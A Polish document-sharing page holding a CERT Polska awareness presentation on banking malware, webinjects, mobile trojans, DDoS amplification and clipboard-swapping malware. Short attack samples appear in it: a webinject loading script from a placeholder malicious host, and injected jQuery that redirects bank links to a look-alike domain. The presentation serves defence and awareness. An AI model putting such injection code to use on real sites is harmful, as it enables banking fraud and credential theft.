<cyber> Zagrożenia </cyber>

Podobne dokumenty
n6: otwarta wymiana danych

Tytuł prezentacji. Wykrywanie cyberzagrożeń typu Drive-by Download WIEDZA I TECHNOLOGIA. Piotr Bisialski Security and Data Center Product Manager

Usługa skanowania podatności infrastruktury IT Banków oraz aplikacji internetowych

Raport. Przejęcie domen instancji plitfi botnetu Citadel

Realne zagrożenia i trendy na podstawie raportów CERT Polska. CERT Polska/NASK

Powstanie i działalność Rządowego Zespołu Reagowania na Incydenty Komputerowe CERT.GOV.PL

Instalacja i konfiguracja rouera ASMAX AR 904u. Neostrada, Netia

Jak skonfigurować bezpieczną sieć bezprzewodową w oparciu o serwer RADIUS i urządzenia ZyXEL wspierające standard 802.1x?

Pracownia internetowa w każdej szkole (edycja Jesień 2007)

Telefon IP 620 szybki start.

Migracja bazy danych Microsoft Access *.mdb do Microsoft SQL 2008 Server R2 SP1 dla oprogramowania Płatnik

Analiza możliwości złośliwego oprogramowania vjw0rm w kampanii phishingowej PayU

Telefon AT 530 szybki start.

Botnet Hamweq - analiza

Od assemblera do html5

WYŻSZA SZKOŁA ZARZĄDZANIA I MARKETINGU BIAŁYSTOK, ul. Ciepła 40 filia w EŁKU, ul. Grunwaldzka

Bramka IP 2R+L szybki start.

Rejestratory AVILINK Konfiguracja połączenia przez Chmurę P2P Rejestratory AVILINK Konfiguracja połączenia przez Chmurę P2P

Aplikacje www. Wykład 1 Wprowadzenie do tematyki. Joanna Kołodziejczyk. 19 luty Joanna Kołodziejczyk Aplikacje www 19 luty / 29

Sieci komputerowe. Wstęp

Urządzenie InelNET-01 służy do sterowania radiowym systemem SSN-04R firmy INEL poprzez internet.

Jak Zamienić Dolary na Złotówki w Procesorze Payza i Przelać Złotówki na Konto Polskie? Instrukcja Krok Po Kroku

Urządzenie InelNET-01 służy do sterowania radiowym systemem SSN-04R firmy INEL poprzez internet.

Analiza malware Remote Administration Tool (RAT) DarkComet

Sprawozdanie. (notatki) Sieci komputerowe i bazy danych. Laboratorium nr.3 Temat: Zastosowanie protokołów przesyłania plików

Instrukcja instalacji karty Merlin XU870 w systemie operacyjnym Mac OS X

Rozwiązanie Zadania egzaminacyjnego egzamin praktyczny z kwalifikacji e13 styczeń 2015

Niektóre typowe cechy wiadomości typu phishing to:

Urządzenie InelNET-01 służy do sterowania radiowym systemem SSN-04R firmy INEL poprzez internet.

OCHRONA PRZED RANSOMWARE. Konfiguracja ustawień

Analiza aktywności złośliwego oprogramowania Njw0rm

INSTRUKCJA OBSŁUGI KAMERY PTZ

Wa W kacyjne Rachunki Secure 2014

Instrukcja obsługi i konfiguracji telefonu Yealink T32G (v )

Zagrożenia mobilne w maju

Krótka instrukcja instalacji

Urządzenie TL-WA7510N jest przeznaczone do połączeń point-to-point na daleką odległość. Umożliwia zdalne udostępnianie Internetu.

Podstawy bezpieczeństwa

CERT POLSKA. Raport Przypadki naruszające bezpieczeństwo teleinformatyczne

Program ochrony cyberprzestrzeni RP założenia

Rozszerzenie EPP o DNSSEC

PODSTAWOWA OBSŁUGA PROGRAMU PROGRAMU PACKET TRACER TRYB REAL TIME

ZAKŁAD SYSTEMÓW ROZPROSZONYCH. Politechnika Rzeszowska BEZPIECZEŃSTWO I OCHRONA INFORAMCJI

Przełączanie i Trasowanie w Sieciach Komputerowych

Wykład 3 Inżynieria oprogramowania. Przykład 1 Bezpieczeństwo(2) wg The Java EE 5 Tutorial Autor: Zofia Kruczkiewicz

Najważniejsze trendy i zjawiska dotyczące zagrożeń teleinformatycznych w Polsce. Rafał Tarłowski CERT Polska/NASK

Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu http.

Czy ochrona sieci jest nadal wyzwaniem, czy tylko jednorazową usługą?

Wykład 3 / Wykład 4. Na podstawie CCNA Exploration Moduł 3 streszczenie Dr inż. Robert Banasiak

INFORMATOR TECHNICZNY WONDERWARE

Proces dostępu do danych

OCHRONA PRZED RANSOMWARE

TCP/IP. Warstwa aplikacji. mgr inż. Krzysztof Szałajko

Instrukcja do panelu administracyjnego. do zarządzania kontem FTP WebAs.

Adres IP

Orange Polska S.A. Bezpieczeństwo Systemów Teleinformatycznych / Wydział Operacji Bezpieczeństwa

Rejestratory AVILINK. ze starszym firmware v3

DZIEŃ BEZPIECZNEGO KOMPUTERA

Protokoły komunikacyjne

INFORMATOR TECHNICZNY WONDERWARE

Prezentacja programu

Bezpieczeństwo Komunikatorów

Tomasz Greszata - Koszalin

PI-12 01/12. podłączonych do innych komputerów, komputerach. wspólnej bazie. ! Współużytkowanie drukarek, ploterów czy modemów

Zespól Szkół Ponadgimnazjalnych Nr 17 im. Jana Nowaka - Jeziorańskiego Al. Politechniki 37 Windows Serwer 2003 Instalacja

systemów intra- i internetowych Platformy softwarowe dla rozwoju Architektura Internetu (2) Plan prezentacji: Architektura Internetu (1)

Necurs analiza malware (1)

Instalacja oprogramowania Platforma Systemowa ArchestrA 2012 R2

Instalacja oprogramowania Platforma Systemowa Wonderware 2017 UPDATE 1

Orange Polska S.A. Bezpieczeństwo Systemów Teleinformatycznych / Wydział Operacji Bezpieczeństwa

Sprawozdanie Laboratorium 4

Snifery wbudowane w Microsoft Windows

Zagrożenia bezpieczeństwa informacji. dr inż. Wojciech Winogrodzki T-Matic Grupa Computer Plus Sp. z o.o.

Sieci komputerowe. Wykład dr inż. Łukasz Graczykowski

Innowacja Technologii ICT vs Człowiek

Konfiguracja pracy rejestratora w sieci

Wskazówki dla osób, które będą uruchamiały Wirtualny Serwer Egzaminacyjny w pracowni komputerowej pracującej pod kontrolą serwera SBS

Pracownia internetowa w każdej szkole (edycja jesień 2005)

Sieci komputerowe - administracja

Podstawy Informatyki. Inżynieria Ciepła, I rok. Wykład 14 Protokoły sieciowe

Automatyczne testowanie infrastruktury pod kątem bezpieczeństwa. Leszek Miś IT Security Architect RHCA,RHCSS,Sec+ Linux Polska Sp. z o.o.

Agenda. Rys historyczny Mobilne systemy operacyjne

Jak ograniczyć zagrożenie związane ze zjawiskiem credential abuse? Bartlomiej Jakubowski Solutions Engineer II, CISSP, CCSP

Pracownia internetowa w każdej szkole (edycja Jesień 2007)

SIECI KOMPUTEROWE - BIOTECHNOLOGIA

Malware: złośliwe oprogramowanie. Marek Zachara. 1/18

PAP-2T w sieci FreePhone

Windows Server 2012 Active Directory

Czy technologie XX wieku mają szanse z cyberprzestępczością XXI wieku?

Instalacja i uruchomienie usługi telefonii internetowej HaloNet dla FRITZ!Box Fon WLAN 7170

Ćwiczenie 1 Praca w grupie roboczej

Przewodnik Google Cloud Print

Bezpieczeństwo aplikacji WWW. Klasyfikacja zgodna ze standardem OWASP. Zarządzanie podatnościami

Tomasz Greszata - Koszalin

ABC systemu Windows 2016 PL / Danuta Mendrala, Marcin Szeliga. Gliwice, cop Spis treści

Szkolenie autoryzowane. STORMSHIELD Network Security Administrator. Strona szkolenia Terminy szkolenia Rejestracja na szkolenie Promocje

Instrukcja konfiguracji urządzenia Comarch TNA Gateway Plus

Analiza Trojana NotCompatible.C

Analiza Malware Win32.KeyloggerSpy

Tomasz Greszata - Koszalin

Transkrypt:

<cyber> Zagrożenia </cyber> Wszystko, co chcielibyście wiedzieć o bezpieczeństwie w sieci a boicie się zapytać Radosław Żuber - NASK / CERT Polska Krajowa Izba Gospodarcza - 29/10/2015

O CERT Polska Działamy w strukturach Naukowej i Akademickiej Sieci Komputerowej (NASK) Do głównych zadań należy: rejestrowanie i obsługa zdarzeń naruszających bezpieczeństwo sieci aktywne reagowanie w przypadku wystąpienia bezpośrednich zagrożeń dla użytkowników współpraca z innymi zespołami CERT w Polsce i na świecie prowadzenie działań zmierzających do wzrostu świadomości dotyczącej bezpieczeństwa teleinformatycznego działalność badawcza z zakresu metod wykrywania incydentów bezpieczeństwa, analizy złośliwego oprogramowania i systemów wymiany informacji o zagrożeniach rozwijanie własnych narzędzi do wykrywania, monitorowania, analizy i korelacji zagrożeń www.cert.pl/o-nas 3/65

Źródło: krebsonsecurity.com 4/65

Boty w Polsce w lutym 2015 5/65

Boty w Polsce w październiku 2015 6/65

Jak ukraść 10 milionów?

Pozyskujemy malware 8/65

Dostarczamy malware 9/65

Dostarczamy malware 10/65

Dostarczamy malware 11/65

Dostarczamy malware 12/65

Dostarczamy malware 13/65

Zarządzamy - VMZeus 14/65

Zarządzamy - VMZeus 15/65

Zarządzamy - VMZeus 16/65

Zarządzamy - VMZeus 17/65

Zarządzamy - Tinba 18/65

Zarządzamy - Andromeda 19/65

Man in the Browser

Man in the Browser 21/65

Man in the Browser 22/65

Automatic Transfer System 23/65

az7 Home Banks Holders Drops Dropovods Transactions Logs Statistics Logout User: coder Now: 2013-05-16 08:46:37 LOC-2150903 Country Name Acounts Comments CZ BANK1 157 webinjects.txt CZ BANK2 0 webinjects.txt PL BANK3 0 webinjects.txt PL BANK4 396 webinjects.txt PL BANK5 0 webinjects.txt 24/65

rbaatsengine 25/65

rbaatsengine 26/65

rbaatsengine 27/65

Przystępujemy do działania

Webinject! <script id="inj_lib" src="http://evil.server/lib.js"></script> JAVASCRIPT Target URL: "*/nasz.internetowy.bank/*" data_before <head*> data_end data_inject <script id="inj_lib" src="http://evil.server/lib.js"></script> data_end data_after data_end WEBINJECT 29/65

Wyświetlany komunikat (pisownia oryginalna) Ze wzgledu na wzrastajaca ilosc wystepowania nieuczciwych transakcji z rachunkow klientow wszystkie platnosci przez Internet bankowy podlegaja ubezpieczeniu. kwoty platnosci do 300000 zl - bezoplatnie kwoty platnosci ponad 300000zl - 50 zl. 30/65

Wyświetlany komunikat 31/65

Wyświetlany komunikat 32/65

Zainfekujmy smartfona

Możliwości get info znak sterujący #, numer tel. gdzieś w wiadomości new number znak sterujący /, numer tel. gdzieś w wiadomości n znak sterujący, uninstall znak sterujący! +34 668 809 167 35/65

Wątek hiszpański fonyou.es 36/65

Hacked router

Złośliwe resolvery

Doniesienia o lukach... Źródła: zaufanatrzeciastrona.pl niebezpiecznik.pl sekurak.pl 40/65

Następstwa luk... Źródła: zaufanatrzeciastrona.pl niebezpiecznik.pl sekurak.pl 41/65

Jak to działa? 42/65

Jak to działa? 43/65

Dołączony kod na końcu strony <script> JAVASCRIPT jquery(document).ready(function() { jquery('a[href*="ebgz.pl"]').attr('href','http://ssl-.ebgz.pl/'); jquery('li p a.button.green').attr('href','http://ssl-.ebgz.pl/'); }); </script> 44/65

Jak to wygląda po drugiej stronie?

Jak to wygląda po drugiej stronie? 50/65

Infrastruktura "open"

Protokoły umożliwiające wzmocnienie ataku DDoS Protocol Bandwidth Ampli cation Factor Vulnerable Command DNS 28 to 54 see: TA13-088A [4] NTP 556.9 see: TA14-013A [5] SNMPv2 6.3 GetBulk request NetBIOS 3.8 Name resolution SSDP 30.8 SEARCH request CharGEN 358.8 Character generation request QOTD 140.3 Quote request BitTorrent 3.8 File search Źródło: US CERT 52/65

Protokoły umożliwiające wzmocnienie ataku DDoS Protocol Bandwidth Ampli cation Factor Vulnerable Command Kad 16.3 Peer list exchange Quake Network Protocol 63.9 Server info exchange Steam Protocol 5.5 Server info exchange Multicast DNS (mdns) 2 to 10 Unicast query RIPv1 131.24 Malformed request Portmap (RPCbind) 7 to 28 Malformed request Źródło: US CERT 53/65

54/65

Polskie wynalazki

VBKlip Pierwsze doniesienia w październiku 2013 Funkcjonalność keylogera Przesyłanie logów mailem Podmiania "w schowku" 26 cyfr (również w określonym formacie) na inne 26 cyfr Pobieranie numerów kont słupów z serwera C&C Uruchamiał się również po restarcie systemu VB malware replaces copied bank account number 56/65

VBKlip.B Styczeń 2014 Napisany w.net Numer konta zapisany w złośliwym oprogramowaniu Nie potra ł "przeżyć" restartu systemu 57/65

Banatrix 58/65

Backspacetrix Odkryty pod koniec 2014 roku Ten sam autor co VBKlip.B Napisany w.net Brak komunikacji z C&C - numer konta zapisany w złośliwym oprogramowaniu Logowanie wciśniętych klawiszy i jeśli było wpisanych 26 cyfr (nie licząc białych znaków) - symulowanie odpowiedniej liczby wciśniętych klawiszy shift i backspace 59/65

VBKlip.AHK Napisany w AutoHotKey Podmiana ("w schowku") numerów kont lub adresów bitcoinowych Ten sam autor co VBKlip.B 60/65

n6 network security incident exchange

n6 ponad 600 tys. nowych zdarzeń dziennie dostęp całkowicie bezpłatny 62/65

n6 - dołącz do nas Twoje dane już tu są ;-) n6.cert.pl 63/65

<Thank You!> info@cert.pl www.cert.pl secure.edu.pl/warsztaty cert.pl/szkolenia